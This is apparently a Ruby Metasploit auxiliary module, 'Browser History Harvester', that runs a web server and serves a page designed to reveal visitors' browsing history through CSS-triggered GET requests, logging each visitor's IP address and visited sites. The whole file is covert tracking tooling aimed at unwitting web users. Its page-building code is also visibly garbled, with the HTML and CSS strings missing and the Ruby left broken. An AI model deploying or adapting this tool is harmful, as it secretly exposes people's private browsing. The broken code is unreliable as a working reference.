require 'msf/core' class Metasploit3 < Msf::Auxiliary # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Browser History Harvester', 'Description' => %q{ This module creates a page containing CSS and HTML which will trigger GET requests based on visited sites. This allows an attacker to obtain browser history information without the use of scripting. }, 'License' => MSF_LICENSE, 'Author' => [ 'Saint Patrick ' ], 'Version' => '$Revision: 10 $', 'References' => [ ['URL','http://ha.ckers.org/blog/20070228/steal-browser-history-without-javascript/'] ] )) register_options( [ OptPath.new('SITELIST', [ false, "The list of URLs that visits will be checked on", File.join(Msf::Config.install_root, "data", "exploits", "capture", "http", "sites.txt") ]) ], self.class) end def on_request_uri(cli, request) tokenize = request.uri.split('?') # Checking to see if this is an initial request or if we should print a host if (tokenize.length > 1) tokenize[1].chomp!('=') print_status("#{cli.peerhost} visited: #{tokenize[1]}") send_response(cli,"HTTP/1.1 404 Not Found\r\n") else print_status("Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}") resp = build_page send_response(cli,resp) print_status("Sent page to #{cli.peerhost}") return end end def build_page @sitecount = 0 page = %Q^ " @sitecount = 0 @list.each do |site| next if site =~ /^#/ site.strip! next if site.length == 0 page << "#{site}
" @sitecount=@sitecount+1 end page << "" return page end # Initialize all things holy def run @sitelist = datastore['SITELIST'] @myuri = datastore['URIPATH'] # Read here and use as gospel from here on out @list = File.readlines(@sitelist) exploit() end end